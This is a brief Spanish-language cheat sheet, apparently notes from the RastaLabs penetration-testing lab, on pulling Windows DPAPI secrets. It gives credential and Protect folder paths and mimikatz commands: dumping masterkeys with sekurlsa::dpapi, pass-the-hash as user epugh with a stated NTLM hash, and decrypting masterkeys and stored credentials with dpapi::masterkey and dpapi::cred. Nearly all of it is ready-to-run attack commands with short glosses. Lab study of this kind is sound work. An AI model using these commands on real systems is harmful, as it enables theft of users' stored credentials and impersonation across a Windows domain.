C:\users\<user>\appdata\local\microsoft\credentials\<blob> (blob es un archivo binario que contiene la masterkey cifrada con la contraseña del usuario)
C:\users\<user>\appdata\roaming\microsoft\protect\<SID>\ (contiene el masterkey cifrado con la contraseña del usuario)
mimikatz sekurlsa::dpapi: Obtenemos las masterkeys cifradas con la contraseña del usuario
sekurlsa::pth /user:epugh /domain:rastalabs.local /ntlm:326457b72c3f136d80d99bdbb935d109 /impersonateprocess: Nos logeamos como el usuario que tiene la masterkey
mimikatz dpapi::masterkey /in:C:\Users\epugh\AppData\Roaming\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-ba29d263dda2: Obtenemos la masterkey cifrada con la contraseña del usuario
mimikatz dpapi::masterkey /in:C:\Users\epugh\AppData\Roaming\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-ba29d263dda2 /rpc: Obtenemos la masterkey cifrada con la contraseña del usuario con rpc, usa el servicio lssass
dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\<CRED_GUID> /masterkey:<MASTERKEY_HEX> : Obtenemos las credenciales cifradas con la masterkey